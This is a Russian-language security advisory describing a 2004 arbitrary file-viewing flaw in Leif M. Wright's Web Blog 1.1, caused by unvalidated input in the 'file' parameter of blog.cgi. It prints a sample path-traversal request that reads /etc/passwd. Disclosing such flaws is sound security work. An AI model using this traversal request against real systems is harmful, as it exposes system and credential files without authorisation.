Просмотр произвольных файлов в Leif M. Wright's Web Blog

Дата публикации:
30.01.2004
Всего просмотров:
1118
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Leif M. Wright Web Blog 1.1

Описание: Уязвимость обнаружена в Leif M. Wright's Web Blog. Удаленный пользователь может просматривать файлы на целевой системе.

Программное обеспечение не в состоянии правильно проверить данные, представленные пользователем в переменной 'file'.

 
http://[target]/directory/blog.cgi?submit=ViewFile&month=[month]&year=[year]&file=/../../../../../../../../../../../../../../../ ../etc/passwd

URL производителя:http://leifwright.com/scripts/Blog.html

Решение:http://leifwright.com/scripts/zips/blog.zip

Ссылки: ZH2004-01SA (security advisory): Web Blog 1.1 Remote arbitrary files

или введите имя

CAPTCHA